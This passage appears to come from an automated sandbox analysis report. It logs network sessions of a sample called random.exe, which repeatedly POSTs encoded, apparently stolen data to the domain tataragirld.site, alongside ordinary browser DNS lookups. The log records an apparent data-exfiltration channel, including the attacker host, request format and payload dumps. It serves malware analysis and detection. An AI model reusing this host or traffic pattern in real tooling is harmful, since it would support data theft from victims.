                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 37 bb d6 33 b3 b0 59 52 db 1e 30 31 0a 41 e0 80 6e 44 c9 de 66 5e 08 0c 7a 8b 33 72 d0 f3 31 ec a1 38 56 8f bb 4f 95 3a b7 12 f0 f0 45 d2 2d 09 12 0d 0e c9 57 e4 78 4d 80 24 0c 70 59 05 f9 5c 73 b4 4d 74 99 7e a8 64 b6 85 51 f3 e0 61 5c 6a 0e f2 35 b9 0d 3c 19 3d e7 88 16 54 7c 7b 94 2e 0e d6 e1 85 b3 97 5e be 8b 83 7b 7f 94 b9 27 60 e8 f3 3f 95 eb ef cd 81 0b 1a 64 5a c1 0b e2 54 b3 27 95 20 cd f6 f8 71 a1 bf f4 6b 22 49 d3 ec 5e 0e 87 e8 7a 6f 3d ed 08 53 7e bd 01 19 2e 05 ea 63 8f 40 50 d4 aa 46 f9 d3 70 1d 3e 20 6a 68 fd bb 68 a7 e4 86 19 af 03 97 f0 ee 83 f7 1a 64 4a c1 0b da 54 b3 67 95 20 2d f7 f8 71 61 b5 f4 ea 24 49 d3 e6 5e 0e 5e ea 7a 1e 3f ed 48 51 7e 7d 00 29 2e 04 c4 63 8f 74 50 d4 dc 4a f9 65 71 1d a7 24 68 88 fc 3d a8 2f 16 86 19 79 03 97
                                                                                                                                                                                                                                                                                  Data Ascii: 73YR01AnDf^z3r18VO:E-WxM$pY\sMt~dQa\j5<=T|{.^{'`?dZT' qk"I^zo=S~.c@PFp> jhhdJTg -qa$I^^z?HQ~}).ctPJeq$h=/y
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 4a 75 97 4b 81 7f 61 9a bc 4a 48 98 cf c5 29 c1 0a 6f b1 47 a1 c0 37 ca c4 37 ca 7d 8c ff e5 6b 2e e4 76 35 04 92 23 77 8b fc 82 58 08 a7 8f cf 3c 1f 95 c6 cb 35 8c 6f 36 cc 6c a0 67 86 64 33 2e 8e 72 65 c6 0f af 03 7f bd 8d dd e5 d3 1b 6c ef 6b b6 22 70 02 b9 5f 70 a9 5e 0b 7d e6 25 18 8e d6 b7 6e 95 ad e2 35 c1 c0 6d dc 5b 77 dc d7 3d ce 2e 88 94 99 72 21 82 88 ab 2e d1 22 f7 8b d2 9b ee bd 6a cc 5a 4a fc 7c bf 0e 46 55 92 1a 7e 35 05 50 77 d7 73 b8 02 9e 7b 6d 8e 8a a3 8c a4 cc 28 c7 6c 53 5d c8 9f 88 a7 19 7d a5 b2 2e 8e a1 ec d9 c7 0c 46 4c de 1c 32 54 48 6b cc b4 27 60 15 74 9e f9 ad c7 23 e1 bb 6d bb 76 60 48 52 19 9d 9c 3a b8 e1 1f 73 6e 2e b6 9c 0f 9c 3b a1 f4 0e 10 91 70 b1 22 2f 90 df bb b5 a5 e0 43 b0 48 3b 05 9b 94 71 4f 4e 3a 07 d7 63 d5 7c
                                                                                                                                                                                                                                                                                  Data Ascii: JuKaJH)oG77}k.v5#wX<5o6lgd3.relk"p_p^}%n5m[w=.r!."jZJ|FU~5Pws{m(lS]}.FL2THk'`t#mv`HR:sn.;p"/CH;qON:c|
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 14 22 75 ea cd 9c 85 b8 18 17 35 5b 6c eb d8 25 3f ef dc 7d 16 08 c5 f7 4f 2f 42 ad 83 17 a5 43 67 7b 3a 1c 2c 7b 1b c9 0c 8d dc 74 b0 ae 62 69 97 94 22 0e 1f 8b 79 70 d9 74 0c 37 e3 6a 1d 5a c2 3c e8 24 79 40 f6 d4 fe f1 3a d4 b3 28 29 e1 cf fb 44 56 00 9a e6 68 ac 09 c4 3c 3c ad 93 76 47 9a 00 e3 46 db 01 e7 1a fc db c3 65 93 8f 2a a1 a3 f5 57 2d b5 c7 f5 ba 4e e8 cd b8 ab 00 bd 0c a8 d8 d3 82 98 a2 cc d2 eb f6 61 ef 0e 10 10 b0 6a 20 ef 12 10 10 45 1e e3 ef 12 10 10 45 1e bf ef 10 10 10 bb 76 8e 00 b3 f9 cf 36 eb e7 84 52 10 10 10 69 fe 68 e1 b0 cb d9 17 83 6f ef 26 68 1d f5 c9 06 9e 37 f3 ef 1e 98 ef 13 34 1e 10 10 10 cf 5a 0e b9 8c c4 c5 3e 11 1f f0 ef 2e 10 10 51 e4 f1 cf ef 10 10 10 45 1e bf ef 10 10 10 bb 17 c7 ee 10 10 11 c5 93 fb 6e 10 10 90 fb
                                                                                                                                                                                                                                                                                  Data Ascii: "u5[l%?}O/BCg{:,{tbi"ypt7jZ<$y@:()DVh<<vGFe*W-Naj EEv6Riho&h74Z>.QEn
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC14578OUTData Raw: ae 99 0c 22 dd 54 8e 41 36 bf e8 db e9 ca 6f 75 59 f2 df a1 66 7d 1c 0e a3 61 f1 e0 96 aa 1f c9 97 db fc 35 db 05 f5 ab fb f6 47 0f 8d 70 bc bb 6f e5 ea 94 50 32 f4 c3 99 8f d3 a2 d7 1b 22 c9 e3 3b af 6a 46 ad de 32 7a fa bd 6b 0c bc 24 3e 27 69 70 06 df 71 b7 46 e5 3f fd e9 ea 96 ba 6f f3 74 f3 e9 1b d9 ab 46 a2 65 eb 28 17 f8 58 59 53 e7 a9 cb 87 bd 89 7c 82 7a 0c 0b cf 2d b3 4d 59 c9 63 61 51 d1 e9 d2 77 ca 2a 61 d3 ea c7 5e 6a 3f 6e 4b a9 62 dc b2 05 2f 8f 58 f5 8a ad db 83 9f 69 8e 0e e1 4b e4 0d e3 e3 07 0f 7c 7a 04 47 c6 67 9c ca 4e 0c 2d e8 7c df cd 37 f1 3e fe 0e 9c 4a cd ca b9 30 71 6b e1 f3 d5 d5 b1 94 be 83 ce fe cd 4f fd ac 9e a8 05 45 c5 42 aa 6a 1b 67 bd f6 fc 73 c2 ad a5 e5 7f 5e a7 8d f2 da bb 49 f9 2d a4 f1 ae a8 96 35 ac 74 0e 6e f7 9b
                                                                                                                                                                                                                                                                                  Data Ascii: "TA6ouYf}a5GpoP2";jF2zk$>'ipqF?otFe(XYS|z-MYcaQw*a^j?nKb/XiK|zGgN-|7>J0qkOEBjgs^I-5tn
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:05 UTC786INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:05 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZskUwNc9E9m7ykPGvxVF5ZEB3sfodCEh25rtLU4BryYj6jePdCqvAxx3dGSxfqHcK2E8xBPNGvpkPy4K7GOHsvbnnduN5dEnAYmZlHt8OJGavHJNdabEY6Q90PaFaMpsYSu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672cb3bda42c3-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1713&rtt_var=658&sent=40&recv=113&lost=0&retrans=0&sent_bytes=2841&recv_bytes=107916&delivery_rate=1644144&cwnd=203&unsent_bytes=0&cid=00fe54f04dda32e5&ts=692&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  18192.168.2.449905188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:05 UTC427OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 745
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:05 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 95 00 00 00 08 00 00 00 71 94 88 1e 10 10 10 10 16 10 10 10 10 10 10 10 f2 39 01 2c 35 91 31 10 10 10 10 d4 10 10 10 10 10 10 10 f2 39 01 2c b0 86 1c 1c 48 10 10 10 10 10 10 10 4a 10 4a 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 b0 86 1c 1e 10 10 10 10 10 10 10 10 10 10 10 10 12 10 10 10 b0 86 1a 1c 10 10 10 10 ef ef ef ef ef ef ef ef ef ef ef ef 10 10 ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef a1 93 f8 8b eb 46 89 93 7d 00 00 00 a7 00 00 00 08 00 00 00 86 52 d8 1e 10 10 10 10 3a 10 10 10 10 10 10 10 1d b4 a1 2c 35 91 35 3b 91 14 12 57 35 91 10 51 3b 91 12 12 57 35 91 10 51 10 10 10 10 d4 10 10 10 10 10
                                                                                                                                                                                                                                                                                  Data Ascii: }q9,519,HJJF}R:,55;W5Q;W5Q
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:05 UTC797INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:05 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCd80KmYSB%2BW%2F1cmR%2FxF%2BRagn76zCSGFfivI2tbFc4x61ug6cMHtYeniOnJzFx%2BXqpxkXOBawJS4pxY5zc65ACK5jK21j%2BMCQ%2F2g2U6dA%2FKC7fibmlkY50D67CXcJqLHkyE0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672d2acd44356-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2148&min_rtt=1664&rtt_var=970&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1808&delivery_rate=1754807&cwnd=237&unsent_bytes=0&cid=1605ef1b8cb71441&ts=323&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  19192.168.2.449911188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:06 UTC427OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 212
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:06 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 99 00 00 00 08 00 00 00 e8 15 44 16 10 10 10 10 1e 10 10 10 10 10 10 10 c1 3a 98 3c 37 91 91 35 91 33 10 10 10 10 10 d4 10 10 10 10 10 10 10 c1 3a 98 3c b0 86 1c 1c 48 10 10 10 10 10 10 10 4a 10 4a 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 b0 86 1c 1e 10 10 10 10 10 10 10 10 10 10 10 10 12 10 10 10 b0 86 1a 1c 10 10 10 10 ef ef ef ef ef ef ef ef ef ef ef ef 10 10 ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef a1 93 f8 8b eb 46 89 93 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                  Data Ascii: }D:<753:<HJJF
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:06 UTC793INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:06 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ug3x9y3Ag%2B%2BuyOFirzGxsgD3cMYX3fQi7RYwF%2F6URcaG8jvll756WpLxd63PADuPBvyQFLQMaRlGguJpTjydZXCc%2FaTGlVSrCh%2F4wrhW3n6ZAWfHU5hayH8zMd%2F1Y40wTft1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672d83fc58c48-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2293&min_rtt=2020&rtt_var=952&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1275&delivery_rate=1445544&cwnd=215&unsent_bytes=0&cid=1ebf40d4f45e8513&ts=333&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  20192.168.2.449918172.64.41.34436260C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:07 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672dd0c147c8e-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  21192.168.2.449917162.159.61.34436260C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:07 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672dd3d374244-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 18 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  22192.168.2.449919188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC427OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 380
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 95 00 00 00 08 00 00 00 d0 bb 00 2b 10 10 10 10 16 10 10 10 10 10 10 10 b1 67 10 46 35 91 31 10 10 10 10 d4 10 10 10 10 10 10 10 b1 67 10 46 b0 86 1c 1c 48 10 10 10 10 10 10 10 4a 10 4a 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 b0 86 1c 1e 10 10 10 10 10 10 10 10 10 10 10 10 12 10 10 10 b0 86 1a 1c 10 10 10 10 ef ef ef ef ef ef ef ef ef ef ef ef 10 10 ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef a1 93 f8 8b eb 46 89 93 7d 00 00 00 94 00 00 00 08 00 00 00 c9 12 58 20 10 10 10 10 14 10 10 10 10 10 10 10 83 34 a0 50 33 31 10 10 10 10 d4 10 10 10 10 10 10 10 83 34 a0 50 b0 86 1c 1c 48 10 10 10 10 10 10 10 4a
                                                                                                                                                                                                                                                                                  Data Ascii: }+gF51gFHJJF}X 4P314PHJ
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:07 UTC782INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:33:07 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWOB05CgKMM3Iklcc1GPQra8GmiB1SmcoFpomkGKb5MlsGj56Jfv8dsyYlaVeRNUxZ2KfrKEJldYeIepXNHLRfUBWftizgIyJoTf0JWPKars6Ojo7Ogv7DM8SDaLqrgE2LLb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672dd3a8f80da-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1535&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1443&delivery_rate=1902280&cwnd=32&unsent_bytes=0&cid=0bfe21b9c9ed351d&ts=334&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  23192.168.2.449927188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:08 UTC429OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 29729
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:08 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 e6 73 00 00 08 00 00 00 ee b3 90 1a 10 10 10 10 18 10 10 10 10 10 10 10 cd 77 31 24 37 91 10 31 10 10 10 10 75 f6 10 10 10 10 10 10 cd 77 31 24 b0 86 16 18 4a 10 10 00 00 10 bd 55 d0 a2 b0 4b b7 bd ef ef ef ef ef ef ef ef 2e 10 38 10 9e f4 d2 d4 d4 da f4 a8 d8 da f6 c6 f8 ce f0 a8 80 b8 92 9e bc 98 9c ba 82 9a 4c e0 c8 f6 e0 12 10 30 10 14 18 10 10 10 10 10 10 1e 18 10 10 10 10 10 10 12 14 18 eb e7 80 b8 92 9e bc 98 9c ba 82 9a 88 9e a4 9c 96 b8 a4 a4 9e b4 b6 b2 82 b6 96 a0 8a 8e 86 b6 96 92 a4 9a 84 bc 92 b0 94 b0 84 86 92 94 82 a4 86 9a 9e 9c 92 9e 8a 9e 8e 82 ba b0 80 b0 84 8e a2 82 be 8a bc 82 86 be 96 8c ba 8e be 98 8a 9e 96 9c a0 84 b2 92 8c 8a 8a 8e ba 88 82 bc b8 b2 b2 9e ba a4
                                                                                                                                                                                                                                                                                  Data Ascii: }sw1$71uw1$JUK.8L0
